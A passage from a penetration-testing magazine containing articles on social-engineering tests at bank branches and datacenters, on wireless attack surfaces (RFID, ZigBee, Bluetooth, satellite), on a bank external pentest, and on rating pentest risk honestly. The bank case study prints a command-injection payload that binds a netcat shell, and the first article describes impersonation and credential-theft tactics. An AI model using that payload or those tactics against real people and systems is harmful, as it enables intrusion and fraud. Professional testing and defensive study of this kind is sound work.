After I saw that, I printed a PVC credential with
my photograph, name and the charge “security au-
ditor”. Also, I printed business cards with same da-
ta; and at the next I arrive a random branch office,
I dressed a suit and tie; and I asked for the man-
ager; I showed my credential and give him a busi-
ness card. I explained I was performing an auditory
and as part of it I needed access to the server. The
manager, very friendly gave me access to servers.
During my visit I performed two tests; first I asked
to an employee for access to the bank system, us-
ing his user and password, which were domain
credentials; he, very friendly again, gives me in a
post-tip his credentials.
After I asked for access to the rack where server
a network devices were. Employees at local branch
office never perform any operation on the server, but
sometimes support area call them for help, to avoid
move from the main facilities to all local branch of-
fices, support area create generic users and ask to
local employees for easy activities like reboots serv-
er, turn down devices, etc. I asked to the manager
for this generic user, he gave me another post-tip.
I started a little scouting on the networking, us-
ing an old Windows Server 2003, I downloaded
windows hashes, looked installed software where
I found a SQL Server 2005. The generic user was
into the built in group and I accessed to the data-
base to see in detail the content. I found all opera-
tions performed by this local branch office.
This kind of attack, very focused, not repre-
sented the same risk that enters to main facilities,
and basically I accessed to more sensitive infor-
mation than the information I could accessed at
the main facilities. While in the main facilities the
security area has implement biometric controls,
NAC, cameras, etc. at branch offices all the secu-
rity was broken by the trust from the manager on
my fake credential and business cards. I got more
network details and software details with my ap-
Figure 4. Samples of printed credentials
19 http://pentestmag.com Page OPEN 05/2013
proach, even domain users to start a complex to
attack to their infrastructure.
At datacenters is common to perform computer
and laptop extractions to evaluate security con-
trols, and after that review for information cypher,
password policy, BIOS hardening, etc.
At datacenter and companies in general, there
are logs about electronic devices access both
employees and guests; one of the common ways
to control de access is using a sticker with a bar
code printed in it. So, I went to stationery to print
some stickers, the cost was around $200 dollars
per 50 stickers.
I accessed to datacenter facilities as any guest
would have done, walked to the main conference
room and steal a computer there. Quickly I leave
from the datacenter, and in the security control a
policeman asked me for the code bar. He scanned
my fake sticker and obviously an error was showed
by the system; I told to him “maybe is because I’m
new here”, excellent answer, the policeman offered
me apologies and told me “yes, it’s very common
this error with new employees, please write the se-
rial number, and I will check later”.
I reviewed the computer, this computer was used
for all managers and directors to present slides,
and I found financial reports, information about
new projects, new products, weaknesses, and a
big etcetera.
Was very easy extracted a laptop from the data-
center, and actually all computers there have cypher,
but this computer as a public computer where all
people could transfer their files to show them… no.
Summary
I could spend a lot of time writing about my profes-
sional experience related with social engineering
tests, and maybe all of you have your stories, a
lot of them very different depending on your coun-
try, approach and maturity level of security controls
implemented by companies, government and or-
ganizations.
However I have some conclusions that you can
take regardless all the differences, and these con-
clusions beyond about persons trust and goodwill.
Trust and goodwill in persons are good, but the
authority is better. Persons feel good helping oth-
ers, but the reaction would be faster if the order
involves someone of higher authority in the hier-
archical structure of the company. As I showed
in bank scenario, the manager was very friendly
with me because I presented myself as an impor-
tant employee from corporate facilities; this gen-
erates a responsibility feeling in people involved
in the attack, as result he offered all possible in-
formation. However you need to be very careful
and not exaggerate also is normal that someone
who feels frightened by other try to identify mis-
takes in his behavior to not offer support. It’s a
human reaction; you need to be polite but strong,
like a boss.
Don’t limit your imagination in simple attacks,
use all information gathered to perform complex
attacks. Not only attacks to random users, take
care selecting a sample of users from the informa-
tion gathered previously, take your time in fake im-
ages and corporate formats, take care about spell-
ing and grammar; if it is possible don’t use scripts
to send e-mails, write each e-mail by hand and
personalize it for each target, be careful with that.
When you show the test results remember ori-
ent them to business, the important thing for your
clients is not listings with users and passwords,
or other kind of sensitive information; but the im-
pact to his business, the strategy needed to avoid
weaknesses and total cost of it.
Collect all the possible information. As a penetra-
tion test has an information gathering phase active
and passive, the social engineering tests also has
an information gathering phase where you need to
obtain a lot of information about security controls
implemented and processes. You can get informa-
tion using tools like Maltego and FOCA which ones
from public information can get private information
useful for you tests; as names, key persons into
the company, telephones, addresses, documents,
formats, e-mails, etc.
Always orient your results to business. I’m being
very repetitive, but it is important. Mainly because
companies pay a lot of money for this kind of tests
is to know their weaknesses, but beyond to design a
strategy to avoid them in the future, is necessary be
detailed with descriptions about access methods,
human errors, security awareness, security controls
implemented and nice to have recommendations.
CARLOS A. LOZANO
Carlos A. Lozano has been working as Chief Technolo-
gy Ofcer in blue Mammut Computer Security Services,
a little company focused on application and network se-
curity for past 6 months, before worked as security advi-
sor in some companies specialized in security felds. He
founded BugCON Security Conference; the largest secu-
rity conference in Mexico and he’s interested on exploi-
tation techniques, research and reverse engineering.
PENTESTING TRICKS
20 http://pentestmag.com Page OPEN 05/2013
Wireless Penetration
Testing
Beyond the IEEE 802.11 family of standards
The wireless penetration testing covers a large family of wireless
protocols. Usually, the penetration testing companies offer to their
customers only WiFi (IEEE 802.11 family of standards) penetration
tests, leaving out the others widespread wireless technologies.
Wireless protocols like Bluetooh, ZigBee, RFID, NFC, GPRS/EDGE/
HSPA, SAT are often used by companies in the mission-critical
environments, but the security problems are often upstaged by
the business needs until a threat agent learns how expensive is a
breach in terms of money and reputation.
W
hile the end users have discovered the
joys and sorrows of the wireless commu-
nications in the last ten years, the indus-
try has been using these technologies at least for
thirty years. At the beginning their devices were in-
terconnected using very basic proprietary RF tech-
nologies meant to transmit few control data, but
over the years, systems have evolved adopting
more and more sophisticated technologies used for
many different purposes: the wireless technologies
was initially born from the need to manage devic-
es and sensors, regardless of their distance from
the control station. It became almost ubiquitous in
the companies. Despite the technological evolution,
what remains almost the same is the approach to
the design of the systems using these technologies:
the assumption made by engineers who decide to
use wireless communications in their systems is
that there is no possible hostility in the usage made
by users or by the parties joining the wireless com-
munications. We know that it is simply not true, in
the Stuxnet era even my mother could be hostile
without knowing it. Also, in the rare cases where the
engineers designed their systems thinking that the
user could be hostile, they fail because too often the
security is implemented trough obscurity instead in-
stead of using the best practices and well-known
security protocols and algorithms.
In this article we will present an overview of the
security problems and the penetration testing tech-
niques related to the non WiFI (IEEE 802.11 fam-
ily of standards) wireless technologies. Therefore,
the use of the term wireless in the next paragraphs,
should be explained in this sense.
The Wireless Communication’s
Security Big Deal
The big innegable problem in wireless communica-
tions is represented by the shared communication
channel (the air). The sentence may sound trivial, but
during the development of systems that will be us-
ing the wireless technologies, engineers often seem
to forget this fundamental fact. I tell that because in
my work experience, also in the case of systems de-
signed to be equipped with wireless technologies
which provides security features, the security fea-
tures were switched off. The point is not purely tech-
nological, but resides in the technical background of
the system designers that have survived unchanged
during the years along the technological evolution.
21 http://pentestmag.com Page OPEN 05/2013
The paradigm adopted in the design of this kind of
system is something like “it has to work” rather than
“it must work securely” because of the following com-
mon belief: the “Triassic” designers and the compa-
nies that rely on their convictions, “who do you think
would be interested\able to break into our super test-
ed proprietary system?” The problem becomes most
serious considering that such technologies are usu-
ally used in costly systems resilient to the changes.
Imagine a company that has just invested hun-
dreds of thousands euro to deploy a system. Imag-
ine telling them that their system is intrinsecally in-
secure, how do you think they would react?
They, for sure, will not change anything unless
it’s practically demonstrated that a threat agent can
damage their business. Selling the wireless secu-
rity services in this scenario is difficult, and is even
more difficult to identify practical and cost effective
solutions but our experience says that once you
find the key to let your customers understand how
risky it is to keep operating a system relying on
insecure wireless technologies, they will promote
actions to mitigate the risks, involving the security
consultants in the review of the whole system.
The question arises: what is the key to let the cus-
tomer understand the risks in poorly designed de-
vices equipped with wireless technologies in terms
of security? In my experience penetration tests in
these environment have always been planned and
executed following these principles:
Pre Sales\Sales
The approach to the sell of the test has been made
with a specific know-how on the topic. We try to
sensibilize the customer about the threats affect-
ing this kind of technologies without being “terror-
ists”. First of each sales meeting we try to catch
the needs for the Customer’s business and we try
to figure out how a threat agent may affect its busi-
ness model. Our testing idea is then discussed
with the customer to identify exactly its needs.
From our point of view, it is crucial that the propo-
sition is both technical in the analysis of the attack
vectors to test and business oriented in order to
allow the customer to uderstand what the test is
intended for. In general, be consistent in the propo-
sition with an approach inspired by real life security
issues more than on the academic concerns.
Penetration Test Plan
The test plan definition is important for each kind
of test. In wireless testing it is even more important
because unless your company has its own logistic
division equipped with trucks to carry all the devic-
es and the stuff you need to test the wireless infra-
structure, you have to define the technlogies being
tested and the kind of test to perform. It’s really im-
portant that an highly skilled Analyst, in the field of
wireless communications, is involved in this phase.
Just to give you a pratical example, the wrong an-
tenna choice could compromise your analysis. A dif-
ferent story is a black box test, where you defini-
tively need a truck to carry all the needed devices to
analyze an unknown wireless signals. I definitely do
not recommend to plan such a generic wireless test
unless you and the customer are really aware of the
complexity and the trouble you may have to face.
Penetration Test Execution
Apart from methodologies which are always impor-
tant in penetration testing, remember that dealing
with wireless technologies is not a kiddie game, so
please consider your safety, and the safety of the
people around you, while operating with wireless
devices (especially high power ones). Usually we
try to carry out these kind of penetration test in a
laboratory environment where we can take all the
necessary protections in terms of safety and secu-
rity but, if the Customer requires the analysis in a
production environment, we advice him of the po-
tentials security and safety risks. Moreover before
starting the analysis we have a meeting with all the
Customer staff working in the range of our wireless
devices, to inform them about the safety measures
to adopt while we’re working on the penetration test.
In a production environment you have also to keep
in mind that your test may affect more devices than
in your targets scope, so you have to be very care-
ful in evaluating every possible side effect resulting
from the analysis activity. With this in mind and all
the needed precautions, yours analysis can be do-
ne without harming anyone or anything outside your
targets scope.
Wireless Penetration Testing Domains
Depending on the wireless technology being test-
ed, the testing strategy will verify certain aspects
related to the information security besides the
technologies specific vulnerabilities. In general,
during a wireless penetration test you have to ver-
ify, if applicable for the technology, at least the fol-
lowing security domains:
Confdentiality of the Information
Due to the shared communication channel the
confidentiality of the information should be veri-
PENTESTING TRICKS
22 http://pentestmag.com Page OPEN 05/2013
fied during a penetration test. The level of confi-
dentiality and the impacts depends on the tech-
nology being tested, however you have to verify
that the transmitted information are accessible
only to those who are authorized to access it. For
example, imagine an HTTP conversation over an
asymmetric satellitar link (eg. DVB satmodem
where the upstream channel transit over internet,
and the downstream channel transit over the air),
if the channel is not properly protected a threat
agent could be able to access the response from
the server containing sensitive information (eg.
cookie, clear text password returned in later re-
sponse, company infromation contained in the re-
sponse pages, etc.).
Communications Integrity
It is fundamental to ensure that information is not
being corrupted during the transit. Particularly dur-
ing a test you have to check that it is not possible to
inject forged traffic in a communication, or to reinject
part of the listened traffic in the same channel.
Authentication and Authorization
Like any other communication technology, also for
the wireless ones you have to ensure that authori-
zation and authentication mechanism work proper-
ly. In wireless communications these controls are
shared between the parties, so you have to check
that each player involved in the communication
is doing its job. For example, in a tipical “private”
mobile network (where the Customer has its own
APN) the telcos provides the authorization servic-
es and the Customer implements the authentica-
tion ones. A lack of authorization is represented by
the ability to access the network with a generic (U)
SIM, not owned by the Customer, to the “private”
mobile network because the CUG (closed user
group) is missing.
Depending on the technology, the way you per-
form the test may vary both on the used tools and
on the attacked area. In the next paragraphs we
will briefly cover the tools, the devices and the tech-
niques used to perform a wireless penetration test.
RFID Penetration Testing
The RFID technology was born in military area and
at the beginning used as IFF (identification friend or
foe, an identification system to determine if a target
is a friend or enemy) transponder. Nowadays this
technology has many applications such as smart
card, cars, retail stores for inventory tracking, chips
for animals, corporate badges and so on. In a cor-
porate environment usually the following hardware
components are parts to be included in the penetra-
tion testing process: RFID Readers, RFID Tags and
RFID Antennas. Figure 1 shows a typical RFID ar-
chitecture. RFID are usually used in two ways:
Unique ID (UID) Transponders
A transponder operating in this mode uses the LF
band (100 to 150 kHz) for the wireless transmis-
sion. The transponder is programmed by the man-
ufacturer and the chip comes with its own identi-
fication number written in the memory. When the
transponder is in the range of the reader, the mem-
ory content is transmitted to it. In this operating
mode there is no communication origin authentica-
tion so the transponders can send data to anybody
and the reader can receive data from anybody.
MIFARE
A transponder operating in this mode uses the HF
band (13.56 MHz) for the wireless transmission. In
this mode you can find basically two ways of us-
ages: the first one is equivalent to the Unique ID
(UID), the second mode provides a “cryptographic”
technology used to mutual authenticate the tran-
sponder and the reader.
Unfortunately for the ones who adopted these
technology both the operating modes were totally
compromised, leaving several attack scenarios to
a threat agent. The following are some of the typi-
cal attacking scenario that you can analyze during
a penetration test.
Relay Attacks
In this scenario a threat agent is able to perform a
man-in-the-middle attack. Using a device, placed be-
Figure 1. Typical RFID architecture
23 http://pentestmag.com Page OPEN 05/2013
tween a legitimate RFID tag and reader, the threat
agent is able to intercept and modify radio signal.
Network/Transport Layer
In this scenario are included the attacks based on
the way the data are exchanged between the enti-
ties (tags, readers) of an RFID network. We have
to distinguish the attacks against tags, readers and
network protocol. Talking about tags, a threat agent
could both clone and spoof the victims tags. Re-
garding the readers we could choose both the im-
personation and the eavesdropping attacks (an un-
authorized user uses an antenna in order to record
RFID communications). Also consider that RFID
systems are often connected to the back end data-
bases and networking devices, so they are suscep-
tible to the same vulnerabilities of general purpose
network devices.
Application Layer
In this scenario a threat agent could take advan-
tage of the aforementioned attacks to exploit the
back-end software vulnerabilities. The RFID be-
cames the vector for classic attacks such as BoF,
SQL-Injection and so on, depending on the back-
end business application. Depending on your elec-
tronics skills you can build your own professional
RFID penetration test kit starting from 250 up to
1500 €. For example over the Internet you can find
a lot of tutorial to start playing with RFID using the
Proxmark III [1], a general purpose RFID device.
ZigBee Penetration Testing
ZigBee (IEEE 802.15.4 which defines the physical
and MAC layers) is a wireless transmission tech-
nology that operate at 868/915 MHz and 2.4 GHz
frequencies range, originally developed in 1998.
Zigbee was designed to be a short range protocol
to be used in embedded device thanks to its sim-
plicity. Figure 2 shows the Zigbee Protocol Stack.
There are a lot of implementation scenarios but
the built-in protocol supports both mesh and star-
based network topologies. In a typical ZigBee net-
work there are two types of devices: the Target and
the Controller. The first device type is responsible
for the PAN network creation and coordination, the
second device type can join the network created
by the Target by pairing with it. Although the Zig-
Bee protocol stack have been designed with se-
curity in mind, the researchers have found vulner-
abilities that allow a threat agent to harm a ZigBee
PAN. The following are the known ZigBee vulner-
abilities you can analyse during a penetration test:
Physical Attack
Many ZigBee devices use hard-coded encryption
key to encrypt the network traffic. During the boot
process the key is moved from the flash memory to
the RAM which lets a threat agent with physical ac-
cess to the device retrieve it. Consider to plan this
kind of test only in a test environment since you will
have to disassemble the device in order to connect
the probes needed to access the memory.
Key Provisioning Attack
ZigBee uses a protocol known as Over the Air (OTA)
for the delivery of the keys used to encrypt the net-
work traffic. ZigBee networks typically utilize OTA in
large networks, because the ease of updating, in
order to guarantee the transmissions security. Un-
fortunately, due to a little lack in the protocol design
(the cryptographic keys are sent unencrypted), this
mecanism is almost useless from the point of view
of a threat agent because once obtained the keys, it
should be able to decrypt the PAN traffic.
Replay Attack
ZigBee has a really basic replay protection so a
threat agent able to intercept the network traffic is
able to inject any previously observed packet until
the key rotation. Especially in a production envi-
ronment be careful while playing with this: since
you have no idea of what you’re injecting consid-
er that you can cause service disruption or even
worse damages.
Figure 2. Zigbee Protocol Stack, Source Wikipedia
PENTESTING TRICKS
24 http://pentestmag.com Page OPEN 05/2013
The physical attack to the ZigBee devices could
be made using Bus Pirate [2] or GoodFeet [3]. The
other attack simulations can be carried out using
KillerBee[4] and the suggested ZigBee hardware.
Depending on your electronics skills you can build
your own professional ZigBee penetration test kit
starting from 100 up to 350 €.
Bluetooth Penetration Testing
Bluetooth (802.15.1) is is a wireless transmission
technology that operates at 2.4 GHz frequencies
range. Bluetooth was designed to be a short range
protocol with low power consumption. The radio
technology used by the Bluetooth is known as fre-
quency-hopping spread spectrum, which splits and
transmits the data being sent to the other devices
on up to 79 frequencies. The Bluetooth protocol
stack is anything but simple: it can operate in sev-
eral different ways and the testing scenarios are as
wide as the protocol specifications. While you can
find several excellent resources on the Internet
regarding the Bluetooth security and penetration
testing (eg. [5][6]) I will focus on the analysis of the
security testing scenarios related to the embedded
devices and industrial automation world. The fol-
lowing are the known Bluetooth vulnerabilities you
can analyse during a penetration test:
Pairing Eavesdropping
Depending on the Bluetooth version the PIN/Lega-
cy Pairing and LE Pairing are susceptible to eaves-
dropping attacks. A threat agent able to collect all
pairing frames can recover the secret key(s) which
allows device impersonation and data decryption.
PIN Enumeration
Often, especially with older Bluetooth versions, the
PIN used to pair with a device is weak. Since the
pairing mechanism has no bruteforce prevention,
and also considering that often the PIN is a number
composed by 4-5 digits, could be trivial for a threat
agent to retrieve the PIN used for the devices pairing.
Secure Simple Pairing Attacks
The SSP is a method used to establish a secure
connection betwen bluetooth devices. Despite the
secure mechanism a threat agent could abuse
some of the protocol flaws to perform a man-in-
the-middle attack.
Application Layer
In this scenario a threat agent could take advan-
tage of the aforementioned attacks to exploit the
back-end/device software vulnerabilities. The
Bluetooth becames the vector for classic attacks
such as BoF and so on, depending on the backend
business application.
Because of the frequency hopping, the hardware
investments needed to intercept bluetooth com-
munications could be expensive. There are a cou-
ple of cheap alternatives that works well with older
bluetooth version[5] but a professional solution[7]
could be the only choice in certain scenarios.
SAT Penetration Testing
Probably the sat link communications is one of the
oldest wide band technologies adopted by compa-
nies. Originally developed for military uses, this tech-
nology have evolved becoming more accessible.
Nowdays DVB-S2 is the de facto standard (ratified by
ETSI EN 302307) for audio, video and data connec-
tions via satellite. The data connection using the DVB
technology are implemented in the following way:
Sat Modem
The client uses only the satellite downstream, it is
not able to transmit data over the sky. The request
are made trough internet, usually using a PSTN or
an HSPA connection, and the responses are re-
ceived trough the satellite link.
Astro Modem
Both the client and the provider exchange informa-
tion using the satellite link. The requests are sent
by the client to the satellite that forwards them to
provider. The responses follow the same path.
The following are some of the typical attacking
scenarios that you can analyse during a penetra-
tion test:
Data Analysis
Depending on the link scenario the impact of this
may vary, in fact in the case of sat modem, a threat
agent could be able to intercept only the connec-
tion responses to its requests. Usually, this kind of
connection is not encrypted thus all the unprotect-
ed information can be accessed by everyone with
sat coverage.
TCP/IP Attacks
Over a sat link a threat agent can try to exploit all
the known flaws of the TCP/IP suite. For example it
is possible to try to poison the DNS cache, or to hi-
jack the TCP/IP connections. Moreover, if the sce-
nario allows it, you can try to access applications
not directly exposed trough the Internet.
OPEN 05/2013
Despite one can think, the equipment needed, at
least for the sat modem scenario, is not expensive,
you can setup a basic tool kit starting from 100 €.
All you need is a good parabolic antenna and an
adapter SkyStar 2 TV DVB [8].
Conclusion
As shown in the article, the wireless technologies
could harm your Customer business if the data that
are using them are not meant to be delivered across
a shared media and the technologies itself are not
properly protected. Proposing a wide spectrum of
security services for wireless technologies is a plus
even if in some cases the initial investment may be
significative. Remember that, especially in these
kind of penetration test, the analysis itself is only the
starting point: the real challenge is to help the cus-
tomer find a pratical and cost effective solution to
mitigate the identified vulnerabilities.
FRANCESCO PERNA
Computer enthusiast since childhood, has spent more
than 15 years on the research of security issues related
to applications and communication protocols, both from
the ofensive and defensive point of view. He is a part-
ner and technical director of Quantum Leap s.r.l., a com-
pany that ofers security services to companies and orga-
nizations. http://www.linkedin.com/in/francescoperna
– [email protected] – www.quantumleap.it
PIETRO MINNITI
Security Professional from over 10 years, he focused his
research mainly in the ERP security feld. As applica-
tion security specialist in Quantum Leap, he performs
the security analisys on corporate networks and nation-
al critical infrastructure environment. http://www.linke-
din.com/in/pietrominniti – [email protected]
– www.quantumleap.it
References
[1] proxmark3 – https://code.google.com/p/proxmark3/
wiki/HomePage
[2] Bus Pirate – http://dangerousprototypes.com/docs/
Bus_Pirate_v3.5
[3] GoodFeet – http://goodfet.sourceforge.net
[4] KillerBee – https://code.google.com/p/killerbee/
[5] Bluetooth Penetration Testing Framework – http://
bluetooth-pentest.narod.ru/
[6] Martin Karger’blog – http://www.evilgenius.de/cate-
gory/bluetooth/
[7] Bluetooth protocol analyzer – http://www.fte.com/
products/BPA600.aspx
[8] Skystar Adapter – https://www.technisat.com/en_XX/
CASE STUDIES
26 http://pentestmag.com Page OPEN 05/2013
Hacking a Bank
Putting million dollar locks on Barbie’s house
This story is a real life event that took place while I had a blackbox
external pentest for a client in the financial industry, but actually,
the same scenario could happen in any other sector.
A
couple of years ago, I was contacted by a
major commercial bank in my country to con-
duct a series of Blackbox penetration tests
against their external network. Recently, after they
acquired a very expensive Information Security
Management System from a major international
audit firm. The real reason they contracted my ser-
vices was in fact to see how their newly employed
system would react in a real life scenario and the
scope of my actions was to gain access to their
internal network, and no one, myself included,
thought this was going to be an easy task. Chal-
lenge accepted!
According to the contract terms, I was permit-
ted to perform the attacks at any time, just like
a real life attacker. So, at first I thought it would
be wise to perform the initial assessment during
the day, in order to disguise my probes inside the
regular working hour traffic.
The network scan didn’t reveal any interesting
open ports, in fact, the only open active servers
were the two servers running DNS, two different
mail servers running on SSL and one server run-
ning HTTP and HTTPS. All services were up to
date and apparently well enough configured to
resist simple attacks, so I decided that I should
take a look at their web application in hope of
finding a way inside.
The web application was built with PHP and Ja-
vascript on a Unix commercial platform. By manu-
ally browsing the website, I saw a lot of interesting
places that showed a lot of promise for launching
further attacks, so, naturally, I decided to start an
automatic crawl of the website.
At first sight the application seemed very com-
plex and with many pages so I decided to start an
aggressive crawl with a few tenths of concurrent
threads against it. After few minutes, I noticed my
crawler hanged and I realized their IPS was block-
ing my probe attempts, probably due to a throttling
mechanism. So I changed my IP address (remem-
ber, it was a ‘blackbox pentest’) and started a new,
less aggressive crawl. After a few minutes, the
same result: my crawler hangs because my IP ad-
dress was blocked again. Getting more and more
frustrated I decided to start a manual crawl of the
application, just to see how it reacts, and how I
should set up the things for a successful automat-
ed crawl.
Indeed, the IPS didn’t block my manual crawl.
But setting the automated crawler to perform its
task at a human pace would’ve meant an incred-
ible amount of time. I took that bet and I let it crawl
while I started poking and probing around, playing
with different parameters just to see how the appli-
cation would react to a fuzzing tool. And I managed
27 http://pentestmag.com Page OPEN 05/2013
to make it spill out a few application error messag-
es. Nothing great, I know, but still, it was some-
thing.
Soon, I started fuzzing the parameters I discov-
ered earlier as being prone to errors hoping I can
make them spill out even more interesting error
messages, such as SQL errors or at least some
input validation application errors. To my despair,
the IPS rules were perfectly set to match my at-
tacks and I was growing way too frustrated to
have the patience of discovering the limitations
they implied. So I decided to leave it for later,
and go out for a hot espresso just to clean up my
mind.
I returned to the office at around 22:00 PM, eager
to work. I decided I should re-do everything from
step 1, just in case I might have missed something
earlier, so I started a new external network scan.
I never hoped for anything to be different but as
soon as I started reading the output file, I noticed
a new IP address as active, running a service on
a very high port, 56635. Grabbing the banner on
this port didn’t reveal anything so I decided to run
AMAP.
‘Protocol on xx.xxx.xxx.xx:56635/tcp matches
ssl’. Immediately I start a browser and.. What do
I see? The login page to a PhpMyAdmin inter-
face. I find out the version running and start look-
ing around the Web for useful information about it,
but the only thing I learned was that this was one
of the newest versions, bearing little to none vul-
nerabilities.
The only place I had left to try was to attack the
parameters in the login page itself, so I started
fuzzing those in hope of finding SQL injection or
similar.
But I never expected what was next to happen.
My fuzzing tool warned me that something really
weird was happening. Not in terms of error mes-
sages. Instead the server replied with HTTP/1.1
200 OK to a request that was specially crafted to
be erroneous. Analyzing the ‘messy’ request, I re-
alized it was a command injection request, one
that should have never worked, not since 2003
anyway: I couldn’t believe my eyes, but there was
an Apache webserver running a vulnerable mod_
auth_any, an Apache Module which allows the use
of third-party authentication programs. The prob-
lem with the module is a command injection vul-
nerability, and only feeding the ‘;’ character in ei-
ther the username or password field granted me
access to the PhpMyAdmin interface. But that was
nothing. By crafting a special request I managed
to bind a netcat to a free port, thus granting me ac-
cess to the operating system: MISSION ACCOM-
PLISHED!
From what I learnt later, that server was an inter-
nal web portal, with file sharing capabilities. Nor-
mally, no services were running on the public in-
terface of the server, but because administrators
needed remote access to the administration panel,
they thought it would be safe to have PhpMyAdmin
binding a high port on internet facing interface af-
ter work hours. That is why the first audit firm didn’t
discover the ‘cloaked’ service; this is why my initial
working hours, assessment didn’t find it either.
This is how, due to laziness, system administra-
tors can introduce risks even in the most expensive
information security management system, making
hundreds of thousands of dollar worth as much as
an outdated Apache version running a vulnerable
and outdated authentication module.
The contractor was shocked that I was able to
circumvent very expensive security mechanisms,
especially because, being a hacker I could have
easily gotten access to the internal network, thus
being able to further expand the compromise. The
biggest problem was that the attack went unde-
tected, all they could catch on their IDS was my
initial crawl of their main application, as no tools
were needed to perform the actual attack, all I did
was typing ;nc –l –p 31337 –e /bin/bash in the
authentication’s form username field. The conclu-
sion I might draw is that expensive security can be
rendered useless using only tools like nmap, amap
and pure intuition.
ANDREI BOZEANU
AB Consultancy Software SRL is a newly merged com-
puter security company located in Bucharest, Romania
whose main area of activity is penetration testing and
forensics examination. Our experts have over 20 years
of international experience in the feld of computer se-
curity research, both ofensive and defensive security,
ranging from malware and antimalware research, soft-
ware audit, exploit developpment or cryptology. Our
customers are government, military or fnancial indus-
tries, both based in Romania or abroad.
CASE STUDIES
28 http://pentestmag.com Page OPEN 05/2013
Do No Harm
A few years ago I engaged a global security consulting practice
to perform an attack and penetration exercise on the company
I worked for as the CISO. Shortly into the engagement, the
consultants approached me with some dire news. They had
discovered several High Risk vulnerabilities in one of the most
important corporate web applications, and were recommending
aggressive remediation measures.
M
ore recently, I worked with a company that
had just completed a security scan of its
primary web application and had discov-
ered literally hundreds of High Risk vulnerabilities.
I was in the meeting when the CISO presented this
information to executives, and you could almost
see the blood drain from their faces. Very quickly,
the dialog in the room began focusing on aggres-
sive options for attacking the problems.
Infosec to the rescue, right? Unfortunately, no.
Misinformation
These days, everyone is pretty aware of the need
to minimize the likelihood for penetration testing
activities to adversely affect production data and
systems. In most cases, significant care is taken to
coordinate activities and get appropriate approvals
before work begins. Yet a more subtle but equally
critical problem is often overlooked – misinforming
the people we serve.
An executive’s plate is filled with aggressive com-
petitors, regulators who seem to want to bury them
in paperwork, technology that can fail at just the
wrong moment, market forces that seem to change
on a whim, human resource issues that would make
Ghandi reach for a stick, and, oh yeah, cyber se-
curity issues. Improperly managed, any of these is-
sues can ruin an organization. Because there are
never enough resources to cover everything, exec-
utives must choose which of the many challenges
they face will get their limited resources. To make
good choices they need good information regarding
expected costs and benefits. Relying upon impaired
or incomplete information can seriously affect deci-
sion quality and company welfare.
Back to the Scenarios
In the first scenario at the beginning of the article,
I examined the pen test findings and pushed back
on the consultants. Yes, they had identified weak-
nesses, but had they considered the frequency
of the kinds of attacks that would leverage those
weaknesses? How about the frequency of any sort
of attack against that application and especial-
ly the part of application where the weaknesses
existed? How much skill was required to exploit
those weaknesses? What kind of access to under-
lying sensitive data would be gained and/or what
level of control over the underlying systems? After
talking through these considerations, the consul-
tants backpedaled and changed the High severity
of their findings to Medium, and in several instanc-
es, to Low. As a result, my organization was able to
appropriately prioritize its remediation efforts and
avoid unnecessarily impacting key projects and
business operations.
OPEN 05/2013
In the second scenario, I intervened with some
questions for the CISO before the decision-making
went too far:
• Was the application new, or had it been on the
Internet for some time? (Answer: It had been in
place for years.)
• Were these weaknesses new, or had they like-
ly been there a while? (Answer: Most were be-
lieved to have been there for months or years.)
• Was the application subject to threat events
with any regularity? (Answer: Yes, it was con-
stantly being attacked.)
• Given the above, how come their company
was still in business? (Answer: Blank stare)
• Had the organization regularly engaged out-
side consultants to attack the application? (An-
swer: Yes, annually.)
• Were they hiring competent consultants? (An-
swer: Yes)
• Had those consultants successfully breached
the application at any time? (Answer: No)
Clearly, something wasn’t making sense. Was the
application scanning tool to be believed, or the
penetration testers? Or, perhaps neither? Regard-
less, everyone recognized that to rationally solve
the problem and to avoid wasting resources we
needed more, and better, information.
What’s Wrong?
Risk management is a probability issue. You can
talk to me all day long about what’s possible, but
until I understand the probable frequency and
magnitude of an event, I have no way to properly
gauge its relevance among all of the other issues
I face. Only when you apply some critical thinking
and a reasonably accurate understanding of risk
can you make decent estimates of the probable
frequency and magnitude of an event..
Unfortunately, too often, I’ve seen testers rely on
their tools’ “risk” ratings. Newsflash folks – I have
never seen testing tools get risk right because they
use models and analytic formulas that are broken in
a number of important ways. At other times, I’ve seen
pen test results that clearly reflect the tester’s techni-
cal understanding of what’s possible but completely
disregard what’s probable. For example – “The hack-
ers could take control of this machine, navigate to
that machine, and then have access to the organiza-
tion’s crown jewels!” Yes, certainly, that could hap-
pen. In some cases, though, the odds of an asteroid
striking the organization’s data center next year may
CASE STUDIES
30 http://pentestmag.com Page OPEN 05/2013
be higher. If executives had to address everything
bad that could happen to their organizations they
would be out of business very quickly.
Getting Risk Right
A full treatise on risk analysis would require a
book. Nonetheless, some basic critical thinking
is all that’s required in most cases to avoid gross
misrepresentation of pen test results. Risk boils
down to “How often bad things are likely to occur,
and how bad they will likely be when they do oc-
cur.” When we think in these terms from a pen test
perspective, some basic considerations and ques-
tions will help us more accurately interpret the lev-
el of risk our findings represent. Think of these as
critical thinking “litmus tests” for pen test results.
• How long have the weaknesses existed in the
system/application? Consider the two dimen-
sions to this question – 1) how long an exploit
for the weakness has existed, and 2) how long
the system/application being tested has had
this weakness. In some cases, the system/
application may have had this defective code
from its inception, but the discovery of exploita-
tion methods is recent.
• Have there been any known compromises at
this organization as a result of these weak-
nesses?
• What can/do the logs tell us about how often
the system/application comes under attack?
(And it is often critical to differentiate “casual”
scanning/probing from focused attacks.)
• Which threat communities would consider the
organization to be a target, and what threat in-
telligence do we have that helps to inform us
about the level of attention this organization is
getting from the bad guys?
• What is the value proposition of the target or or-
ganization to the relevant hacking communities?
• How often is this weakness subject to attack in
the wild?
• What kinds of skills are required to leverage
this weakness? As the exploit’s diffculty ris-
es, the number of capable threat agents falls,
which should reduce the frequency of attacks.
• Would an automated attack work for this weak-
ness or would it require a manual effort?
• How noisy would an attack have to be in order
for the attacker to discover and then leverage
the weakness? In other words, how likely is it
that an attack would be noticed (given the de-
tection technologies in place)?
• Where does the weakness reside within the
system/application? Do attackers have to au-
thenticate before they even have the ability to
discover and leverage the weakness?
• Are there controls in place or inherent diffcul-
ties that reduce the likelihood that an attack will
be successful?
• How large in volume is the sensitive data at
risk? Could it be acquired quickly, or would it
require a prolonged effort?
Critically thinking through penetration test fndings
would undoubtedly include other considerations
that depend upon the organization, system/appli-
cation, and threat landscape. Regardless, merely
asking these questions helps ensure that we ac-
curately inform decision-makers.
Bottom line: Any pen test finding you label “High
Risk” represents your professional opinion of a con-
dition that warrants immediate (and sometimes
costly) organizational attention. That being the case,
ask yourself this – if you’re sitting across the table
